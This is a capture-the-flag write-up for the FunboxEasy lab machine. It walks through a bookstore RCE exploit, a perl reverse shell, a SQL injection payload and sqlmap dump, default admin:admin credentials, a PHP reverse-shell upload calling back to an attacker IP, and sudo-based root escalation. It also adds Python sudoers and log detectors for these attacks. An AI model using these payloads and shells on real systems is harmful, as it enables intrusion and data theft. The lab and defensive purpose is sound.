FunboxEasy
Checking out port 80 we have the default install page for Apache 2.
Checking the source on this page reveals no interesting information. From here I executed dirsearch.py against the target machine.
Checking the directory /store we are presented with a web page for ‘CSE bookstore’.
Researching exploits on Google for ‘CSE bookstore’ we are presented with an exploit for Unauthenticated RCE. The exploit PoC has been linked below.
After downloading the PoC I executed it with the following command:
When prompted to launch a shell hit ‘y’.
This shell stops us from properly navigating the target machine and will return us back to the current working directory when the command has finished executing. As such I checked what binaries are installed on the target machine so we can spawn a shell where we can navigate the target properly.
As per above, perl is installed on the system. From here I started a netcat listener on my attacking machine.
I then executed the following command to gain a perl reverse shell.
Moving into the home directory and then into the user tony’s home directory we have passwords.txt. Reading the contents of this text file shows the following information:
I was then able to log in with the SSH password for the user tony.
Checking sudo -l for sudo permissions we come across a multitude of entries.
As we can execute sudo as the user root without supplying a password here, we can use pkexec or time to spawn a bash shell as root.
root@funbox3:/var/www# id
uid=0(root) gid=0(root) groups=0(root)
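As an added defensive check (not part of the original writeup), the following Python audit parses a sudoers file and reports NOPASSWD rules that let a user run, as root, the shell-spawning binaries named above. The sudoers excerpt is constructed for the example and is not the target's actual rule set.

```python
import re

# Constructed sudoers excerpt modelled on the kind of rule set this writeup
# finds with `sudo -l`; it is not taken from the target machine.
SAMPLE_SUDOERS = """\
# Generic defaults
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
tony    ALL=(root) NOPASSWD: /usr/bin/pkexec, /usr/bin/time, /usr/bin/less
backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /var/www /backup/
alice   ALL=(ALL) /usr/bin/apt update
"""

# The two binaries this writeup names, plus the shells themselves and the
# ALL wildcard: any of these under NOPASSWD hands back a root shell.
SHELL_CAPABLE = {"/usr/bin/pkexec", "/usr/bin/time", "/bin/bash", "/bin/sh", "ALL"}

# user  host=(runas[:group])  [TAG:] command[, command ...]
RULE_RE = re.compile(r'^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$')

def parse_rule(line):
    """Split one user-specification line into (user, runas, tags, commands)."""
    m = RULE_RE.match(line)
    if not m:
        return None
    tags, cmds = [], []
    for item in m['rest'].split(','):
        item = item.strip()
        # Strip leading tags such as NOPASSWD: or SETENV: (always upper case).
        while ':' in item and item.split(':', 1)[0].isupper():
            tag, item = item.split(':', 1)
            tags.append(tag.strip())
            item = item.strip()
        cmds.append(item.split()[0] if item else item)  # keep the binary, drop fixed args
    return m['user'], m['runas'].split(':')[0], tags, cmds

def risky_rules(sudoers_text):
    """Return (user, binary) pairs that grant a root shell without a password."""
    findings = []
    for line in sudoers_text.splitlines():
        line = line.strip()
        if not line or line.startswith(('#', 'Defaults')):
            continue
        parsed = parse_rule(line)
        if not parsed:
            continue
        user, runas, tags, cmds = parsed
        if 'NOPASSWD' not in tags or runas not in ('root', 'ALL'):
            continue
        findings.extend((user, c) for c in cmds if c in SHELL_CAPABLE)
    return findings
```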
Alternative way
Login Bruteforce
We can simply try one of the well-known default credential pairs, admin:admin, against http://192.168.120.224/store/admin.php, and we will find that we are logged in as the administrator user of this web store.
SQL Injection Vulnerability
Alternatively, we can exploit an SQL injection vulnerability in the unauthenticated portion of this application. Clicking on a book image we are directed to its page with the bookisbn GET parameter, like this:
http://192.168.178.111/store/book.php?bookisbn=978-1-49192-706-9
We can try a simple payload to test for SQLi vulnerabilities, ' or 1=1; --, like so:
http://192.168.178.111/store/book.php?bookisbn=%27%20or%201=1;%20--
And we see that this application indeed seems to be vulnerable based on the following verbose error:
Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '--'' at line 1
SQLMap
Since the website directory for the store is aptly named store, we can venture an educated guess that the underlying database might also be named store. Using sqlmap, we can automate the exploitation and leak database contents:
kali@kali:~$ sqlmap -u http://192.168.178.111/store/book.php?bookisbn= --dump-all --batch -D store
...
Database: store
Table: admin
[1 entry]
+-------+--------------------------------------------------+
| name | pass |
+-------+--------------------------------------------------+
| admin | d033e22ae348aeb5660fc2140aec35850c4da997 (admin) |
+-------+--------------------------------------------------+
...
kali@kali:~$
And we have obtained the user credentials admin:admin via this vulnerability.
File Upload Vulnerability
Having logged in with the recovered or guessed credentials admin:admin at http://192.168.120.224/store/admin.php, we are redirected to http://192.168.120.224/store/admin_book.php. This page shows a listing of existing books.
In addition, we see a link to Add new book in the top-left portion of the screen that leads us to http://192.168.120.224/store/admin_add.php. Here, it looks like we are able to upload a new file to the store.
We can try uploading a PHP reverse shell from PentestMonkey:
kali@kali:~$ cp /usr/share/webshells/php/php-reverse-shell.php rev.php
We will be sure to change the IP address and port as needed:
kali@kali:~$ cat rev.php
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
...
$ip = '192.168.118.3'; // CHANGE THIS
$port = 4444; // CHANGE THIS
...
kali@kali:~$
There is one caveat in the upload process: the Publisher text field cannot be arbitrary and must be one of several choices. We can easily view these choices on the page http://192.168.120.224/store/publisher_list.php:
kali@kali:~$ curl http://192.168.120.224/store/publisher_list.php
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
...
<div class="container" id="main"> <p class="lead">List of Publisher</p>
<ul>
<li>
<span class="badge">2</span>
<a href="bookPerPub.php?pubid=1">Wrox</a>
</li>
<li>
<span class="badge">2</span>
<a href="bookPerPub.php?pubid=2">Wiley</a>
</li>
<li>
<span class="badge">3</span>
<a href="bookPerPub.php?pubid=3">O'Reilly Media</a>
</li>
<li>
<span class="badge">3</span>
<a href="bookPerPub.php?pubid=4">Apress</a>
</li>
<li>
<span class="badge">0</span>
<a href="bookPerPub.php?pubid=5">Packt Publishing</a>
</li>
<li>
<span class="badge">1</span>
<a href="bookPerPub.php?pubid=6">Addison-Wesley</a>
</li>
<li>
<a href="books.php">List full of books</a>
</li>
</ul>
...
We see Apress as one of the choices listed, and we will use this publisher label. The rest of the fields can contain arbitrary data, like so:
If we now return to http://192.168.120.224/store/admin_book.php, we will see our new entry added to the top of the list:
ISBN   Title  Author  Image                  Description  Price  Publisher
shell  shell  hacker  php-reverse-shell.php  shell        10.00  Apress     Edit Delete
Next, we will set up a listener on port 4444 and then trigger the reverse shell by navigating to http://192.168.53.111/store/bootstrap/img/rev.php.
kali@kali:~$ nc -lvp 4444
listening on [any] 4444 ...
192.168.120.224: inverse host lookup failed: Unknown host
connect to [192.168.118.3] from (UNKNOWN) [192.168.120.224] 38114
Linux funbox3 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
17:16:51 up 1:03, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
And we have a reverse shell as user www-data.
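From the defender's side, both the SQL injection against bookisbn and the upload of a PHP file that is then requested from /store/bootstrap/img/ leave distinctive traces in the web server's access log. The following Python detector is an added example, not part of the original writeup; the Apache combined-format log lines it scans are constructed to mirror the requests made above, and the sqlmap User-Agent string is assumed to be the tool's default.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines modelled on this walkthrough: an ISBN lookup, the
# manual SQLi probe, a sqlmap request, the admin_add.php upload, the webshell call.
SAMPLE_LOG = """\
192.168.118.3 - - [10/Jul/2020:17:10:01 +0000] "GET /store/book.php?bookisbn=978-1-49192-706-9 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.118.3 - - [10/Jul/2020:17:10:09 +0000] "GET /store/book.php?bookisbn=%27%20or%201=1;%20-- HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.168.118.3 - - [10/Jul/2020:17:11:30 +0000] "GET /store/book.php?bookisbn=1%20AND%201=1 HTTP/1.1" 200 812 "-" "sqlmap/1.4.10#stable (http://sqlmap.org)"
192.168.118.3 - - [10/Jul/2020:17:15:02 +0000] "POST /store/admin_add.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.118.3 - - [10/Jul/2020:17:16:51 +0000] "GET /store/bootstrap/img/rev.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
# A legitimate bookisbn value is only digits, hyphens and an optional check digit X.
ISBN_RE = re.compile(r'^[0-9xX-]{10,20}$')
SQLI_HINTS = ("'", '"', ' or ', ' and ', '--', ';', 'union', 'sleep(')

def classify(line):
    """Return the alert tags for one access-log line (empty list if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    alerts, url = [], urlsplit(m['target'])
    if 'sqlmap' in m['ua'].lower():
        alerts.append('scanner-ua')
    for part in url.query.split('&'):
        name, _, value = part.partition('=')
        value = unquote(value).lower()
        if name == 'bookisbn' and not ISBN_RE.match(value) and any(h in value for h in SQLI_HINTS):
            alerts.append('sqli-bookisbn')
    # A .php script requested from the image directory means an uploaded file
    # is being executed where only static assets belong.
    if url.path.startswith('/store/bootstrap/img/') and url.path.endswith('.php'):
        alerts.append('webshell-in-img')
    if m['method'] == 'POST' and url.path == '/store/admin_add.php':
        alerts.append('book-upload')
    return alerts

def scan(log_text):
    """Map each flagged request target to its alert tags."""
    results = {}
    for line in log_text.splitlines():
        tags = classify(line)
        if tags:
            results[LOG_RE.match(line)['target']] = tags
    return results
```

A POST to admin_add.php followed shortly by a .php request under the image directory from the same client is the sequence worth alerting on; on the real host the fix is to reject non-image uploads and disable PHP execution in that directory.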